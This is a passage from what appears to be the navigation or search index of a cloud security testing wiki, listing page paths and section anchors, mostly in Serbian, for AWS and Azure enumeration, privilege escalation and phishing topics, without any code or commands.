ervices/aws-s3-athena-and-glacier-enum.html#verzionisanje-kanti-i-mfa-zasnovano-brisanje","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-pristupni-logovi","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-presigned-url-ovi","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-encryption-mechanisms","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#enumeracija","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#dual-stack","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#neautentifikovani-pristup","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-post-eksploatacija","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#postojanost","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#ostale-s3-ranjivosti","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-http-cache-poisoning-issue","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#amazon-athena","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#reference","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#aws---step-functions-enum","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#step-functions","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#ključni-koncepti","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#standardni-vs-express-radni-tokovi","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#stanja","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#zadatak","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#choice","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#failsucceed","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#pass","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#wait","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#parallel","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#map","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#versions-and-aliases","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#iam-roles-for-state-machines","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#aws---sts-enum","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#sts","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#assume-role-impersonation","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-other-services-enum.html#aws---enum-drugih-usluga","pentesting-cloud/aws-security/aws-services/aws-other-services-enum.html#directconnect","pentesting-cloud/aws-security/aws-services/aws-other-services-enum.html#podrška","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#aws---neautentifikovana-enum--pristup","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#aws-kredencijali-curjenja","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#aws-neautentifikovana-enum--pristup","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#napadi-preko-naloga","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#alati","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#aws---računi-neautentifikovana-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#id-računa","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#brute-force","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#osint","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#marketplace","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#snapshots","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#greške","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#reference","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#aws---api-gateway-neautentifikovana-enumeracija","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#zaobilaženje-api-poziva","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#iam-policy-injection","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#public-url-template","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#dobijanje-id-a-naloga-sa-javnog-api-gateway-url-a","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.html#aws---cloudfront-neautentifikovana-enumeracija","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.html#javni-url-šablon","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#aws---cognito-neautentifikovana-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#neautentifikovani-cognito","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#id-identiteta","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#id-korisničkog-bazena","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#pacu-moduli-za-pentesting-i-enumeraciju","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#aws---codebuild-neautentifikovani-pristup","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#codebuild","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#buildspecyml","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#samostalno-hostovani-github-actions-izvršioci-u-aws-codebuild","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.html#aws---documentdb-neautentifikovana-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.html#javni-url-šablon","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.html#aws---dynamodb-neautentifikovani-pristup","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.html#dynamo-db","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#aws---ec2-neautentifikovana-enumeracija","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#ec2-i-povezane-usluge","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#javne-portove","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#javne-ami-i-ebs-snimci","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#enumerisanje-ec2-instanci-sa-javnim-ip-om","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#aws---ecr-neautentifikovana-enumeracija","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#ecr","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#javne-registri-repozitorijumi-slike","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#nabrajanje-privatnog-repo","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.html#aws---ecs-neautentifikovana-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.html#ecs","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.html#javno-dostupna-bezbednosna-grupa-ili-load-balancer-za-ecs-usluge","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#aws---elastic-beanstalk-neautentifikovana-enumeracija","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#web-ranjivost","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#nepropisna-pravila-sigurnosne-grupe","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#javna-dostupnost-load-balancera","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#javna-dostupnost-s3-bucketa","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#enumeracija-javnih-okruženja","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.html#aws---elasticsearch-neautentifikovana-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.html#javni-url-šablon","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#aws---iam--sts-neautentifikovana-enumeracija","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#enumeracija-uloga-i-korisničkih-imena-u-nalogu","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#pretpostavi-ulogu-brute-force","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#politike-poverenja-brute-force-cross-account-uloge-i-korisnici","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#privesc","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#treća-strana-oidc-federacija","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#reference","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#aws---identity-center--sso-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#aws-device-code-phishing","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#attack","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#phishing-the-unphisable-mfa","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#automatic-tools","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#references","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.html#aws---iot-neautentifikovana-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.html#javni-url-šablon","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.html#aws---kinesis-video-neautentifikovana-enumeracija","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.html#javni-url-šablon","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#aws---lambda-neautentifikovani-pristup","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#javni-url-funkcije","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#Šablon-javnog-url-a","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#dobijanje-id-a-naloga-sa-javnog-lambda-url-a","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.html#aws---media-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.html#javni-url-šablon","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#aws---mq-neautentifikovana-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#javni-port","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#rabbitmq","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#activemq","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#javni-url-šablon","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.html#aws---msk-neautentifikovana-enumeracija","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.html#javni-port","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.html#Šablon-javnog-url-a","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#aws---rds-neautentifikovana-enumeracija","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#rds","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#javni-port","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#javni-rds-snimci","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#javni-url-šablon","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.html#aws---redshift-neautentifikovana-enumeracija","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.html#javni-url-šablon","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#aws---sqs-neautentifikovana-enumeracija","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#sqs","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#javni-url-šablon","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#proverite-dozvole","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.html#aws---sns-neautentifikovana-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.html#sns","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.html#otvoreno-za-sve","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#aws---s3-neautentifikovana-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#s3-javne-kante","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#pronalaženje-aws-kanti","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#pronađite-region","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#enumeracija-bucket-a","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#javni-url-šablon","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#dobijanje-id-a-naloga-iz-javnog-bucket-a","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#potvrđivanje-da-je-kofa-deo-aws-naloga","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#korišćeni-emailovi-kao-enumeracija-root-naloga","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#reference","pentesting-cloud/azure-security/index.html#azure-pentesting","pentesting-cloud/azure-security/index.html#osnovne-informacije","pentesting-cloud/azure-security/index.html#azure-pentesterred-team-metodologija","pentesting-cloud/azure-security/index.html#eksterna-enumeracija--početni-pristup","pentesting-cloud/azure-security/index.html#azure--entra-id-alati","pentesting-cloud/azure-security/index.html#obilaženje-pristupnih-politika","pentesting-cloud/azure-security/index.html#ko-sam-ja","pentesting-cloud/azure-security/index.html#entra-id-enumeracija-i-privesc","pentesting-cloud/azure-security/index.html#azure-enumeracija","pentesting-cloud/azure-security/index.html#eskalacija-privilegija-post-eksploatacija-i-postojanost","pentesting-cloud/azure-security/az-basic-information/index.html#az---osnovne-informacije","pentesting-cloud/azure-security/az-basic-information/index.html#hijerarhija-organizacije","pentesting-cloud/azure-security/az-basic-information/index.html#grupa-za-upravljanje","pentesting-cloud/azure-security/az-basic-information/index.html#azure-pretplate","pentesting-cloud/azure-security/az-basic-information/index.html#grupe-resursa","pentesting-cloud/azure-security/az-basic-information/index.html#azure-resource-ids","pentesting-cloud/azure-security/az-basic-information/index.html#azure-vs-entra-id-vs-azure-ad-domain-services","pentesting-cloud/azure-security/az-basic-information/index.html#azure","pentesting-cloud/azure-security/az-basic-information/index.html#entra-id-ranije-azure-active-directory","pentesting-cloud/azure-security/az-basic-information/index.html#entra-domain-services-ranije-azure-ad-ds","pentesting-cloud/azure-security/az-basic-information/index.html#entra-id-principali","pentesting-cloud/azure-security/az-basic-information/index.html#korisnici","pentesting-cloud/azure-security/az-basic-information/index.html#podrazumevane-dozvole-članova-i-gostiju","pentesting-cloud/azure-security/az-basic-information/index.html#podrazumevane-konfigurabilne-dozvole-korisnika","pentesting-cloud/azure-security/az-basic-information/index.html#grupe","pentesting-cloud/azure-security/az-basic-information/index.html#servisni-principi","pentesting-cloud/azure-security/az-basic-information/index.html#registracije-aplikacija","pentesting-cloud/azure-security/az-basic-information/index.html#podrazumevane-dozvole-pristanka","pentesting-cloud/azure-security/az-basic-information/index.html#upravljani-identitet-metapodaci","pentesting-cloud/azure-security/az-basic-information/index.html#preduzeća-aplikacije","pentesting-cloud/azure-security/az-basic-information/index.html#administrativne-jedinice","pentesting-cloud/azure-security/az-basic-information/index.html#entra-id-uloge-i-dozvole","pentesting-cloud/azure-security/az-basic-information/index.html#azure-uloge-i-dozvole","pentesting-cloud/azure-security/az-basic-information/index.html#ugrađene-uloge","pentesting-cloud/azure-security/az-basic-information/index.html#prilagođene-uloge","pentesting-cloud/azure-security/az-basic-information/index.html#permissions-order","pentesting-cloud/azure-security/az-basic-information/index.html#global-administrator","pentesting-cloud/azure-security/az-basic-information/index.html#assignments-conditions--mfa","pentesting-cloud/azure-security/az-basic-information/index.html#deny-assignments","pentesting-cloud/azure-security/az-basic-information/index.html#azure-policies","pentesting-cloud/azure-security/az-basic-information/index.html#nasleđivanje-dozvola","pentesting-cloud/azure-security/az-basic-information/index.html#azure-rbac-vs-abac","pentesting-cloud/azure-security/az-basic-information/index.html#reference","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#az---tokens--public-applications","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#osnovne-informacije","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#oauth","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#autentifikacioni-tokeni","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#pristupni-tokeni-aud","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#pristupni-tokeni-opsezi-scp","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#primer-dobijanja-refresh--pristupnog-tokena","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#ostala-polja-pristupnog-tokena","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#foci-tokeni-eskalacija-privilegija","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#dobijanje-različitog-opsega","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#dobijte-različite-klijente-i-opsege","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#reference","pentesting-cloud/azure-security/az-enumeration-tools.html#az---enumeration-tools","pentesting-cloud/azure-security/az-enumeration-tools.html#instalirajte-powershell-na-linuxu","pentesting-cloud/azure-security/az-enumeration-tools.html#instalirajte-powershell-na-macos","pentesting-cloud/azure-security/az-enumeration-tools.html#glavni-alati-za-enumeraciju","pentesting-cloud/azure-security/az-enumeration-tools.html#az-cli","pentesting-cloud/azure-security/az-enumeration-tools.html#az-powershell","pentesting-cloud/azure-security/az-enumeration-tools.html#microsoft-graph-powershell","pentesting-cloud/azure-security/az-enumeration-tools.html#azuread-powershell","pentesting-cloud/azure-security/az-enumeration-tools.html#automatizovani-alati-za-rekognosciranje-i-usklađenost","pentesting-cloud/azure-security/az-enumeration-tools.html#turbot-azure-plugins","pentesting-cloud/azure-security/az-enumeration-tools.html#prowler","pentesting-cloud/azure-security/az-enumeration-tools.html#monkey365","pentesting-cloud/azure-security/az-enumeration-tools.html#scoutsuite","pentesting-cloud/azure-security/az-enumeration-tools.html#azure-mg-sub-governance-reporting","pentesting-cloud/azure-security/az-enumeration-tools.html#automated-post-exploitation-tools","pentesting-cloud/azure-security/az-enumeration-tools.html#roadrecon","pentesting-cloud/azure-security/az-enumeration-tools.html#azurehound","pentesting-cloud/azure-security/az-enumeration-tools.html#microburst","pentesting-cloud/azure-security/az-enumeration-tools.html#powerzure","pentesting-cloud/azure-security/az-enumeration-tools.html#graphrunner","pentesting-cloud/azure-security/az-enumeration-tools.html#stormspotter","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#az---neautentifikovana-enumeracija-i-početni-ulaz","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#azure-tenant","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#enumeracija-tenanta","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#user-enumeration","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#password-spraying--brute-force","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#azure-services-using-domains","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#filesystem-credentials","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#references","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-container-registry-unauth.html#az---container-registry-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-container-registry-unauth.html#container-registry-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-container-registry-unauth.html#anonymous-pull-access","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#az---oauth-apps-phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#oauth-app-phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#dozvole-za-saglasnost-aplikacije","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#2-tipova-napada","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#korisnicima-je-dozvoljeno-da-daju-saglasnost","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#administratori-aplikacija","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#pregled-tokova-napada","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#primer-napada","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#ostali-alati","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#post-eksploatacija","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#phishing-post-eksploatacija","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#entra-id-aplikacije-admin","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#post-eksploatacija-aplikacije","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#reference","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#az---storage-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#storage-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#open-storage","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#sas-urls","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#az---vms-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#virtuelne-mašine","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#izložena-ranjiva-usluga","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#javne-galerijske-slike","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#javni-ekstenzije","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.html#az---device-code-authentication-phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.html#az---password-spraying","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.html#password-spray","pentesting-cloud/azure-security/az-services/index.html#az---services","pentesting-cloud/azure-security/az-services/index.html#portali","pentesting-cloud/azure-security/az-services/index.html#sirove-zahteve","pentesting-cloud/azure-security/az-services/index.html#lista-usluga","pentesting-cloud/azure-security/az-services/az-azuread.html#az---entra-id-azuread--azure-iam","pentesting-cloud/azure-security/az-services/az-azuread.html#osnovne-informacije","pentesting-cloud/azure-security/az-services/az-azuread.html#enumeracija","pentesting-cloud/azure-security/az-services/az-azuread.html#konekcija","pentesting-cloud/azure-security/az-services/az-azuread.html#tenants","pentesting-cloud/azure-security/az-services/az-azuread.html#korisnici","pentesting-cloud/azure-security/az-services/az-azuread.html#mfa--conditional-access-policies","pentesting-cloud/azure-security/az-services/az-azuread.html#groups","pentesting-cloud/azure-security/az-services/az-azuread.html#service-principals","pentesting-cloud/azure-security/az-services/az-azuread.html#aplikacije","pentesting-cloud/azure-security/az-services/az-azuread.html#managed-identities","pentesting-cloud/azure-security/az-services/az-azuread.html#azure-uloge","pentesting-cloud/azure-security/az-services/az-azuread.html#entra-id-uloge","pentesting-cloud/azure-security/az-services/az-azuread.html#uređaji","pentesting-cloud/azure-security/az-services/az-azuread.html#administrativne-jedinice","pentesting-cloud/azure-security/az-services/az-azuread.html#entra-id-eskalacija-privilegija","pentesting-cloud/azure-security/az-services/az-azuread.html#azure-eskalacija-privilegija","pentesting-cloud/azure-security/az-services/az-azuread.html#odbrambeni-mehanizmi","pentesting-cloud/azure-security/az-services/az-azuread.html#upravljanje-privilegovanim-identitetima-pim","pentesting-cloud/azure-security/az-services/az-azuread.html#politike-uslovnog-pristupa","pentesting-cloud/azure-security/az-services/az-azuread.html#entra-zaštita-identiteta","pentesting-cloud/azure-security/az-services/az-azuread.html#entra-zaštita-lozinki","pentesting-cloud/azure-security/az-services/az-azuread.html#reference","pentesting-cloud/azure-security/az-services/az-acr.html#az---acr","pentesting-cloud/azure-security/az-services/az-acr.html#osnovne-informacije","pentesting-cloud/azure-security/az-services/az-acr.html#enumeracija","pentesting-cloud/azure-security/az-services/az-application-proxy.html#az---application-proxy","pentesting-cloud/azure-security/az-services/az-application-proxy.html#osnovne-informacije","pentesting-cloud/azure-security/az-services/az-application-proxy.html#enumeracija","pentesting-cloud/azure-security/az-services/az-application-proxy.html#reference","pentesting-cloud/azure-security/az-services/az-arm-templates.html#az---arm-templates--deployments","pentesting-cloud/azure-security/az-services/az-arm-templates.html#osnovne-informacije","pentesting-cloud/azure-security/az-services/az-arm-templates.html#istorija","pentesting-cloud/azure-security/az-services/az-arm-templates.html#pretraga-osetljivih-informacija","pentesting-cloud/azure-security/az-services/az-arm-templates.html#reference","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#az---automation-accounts","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#osnovne-informacije","pentesting-cloud/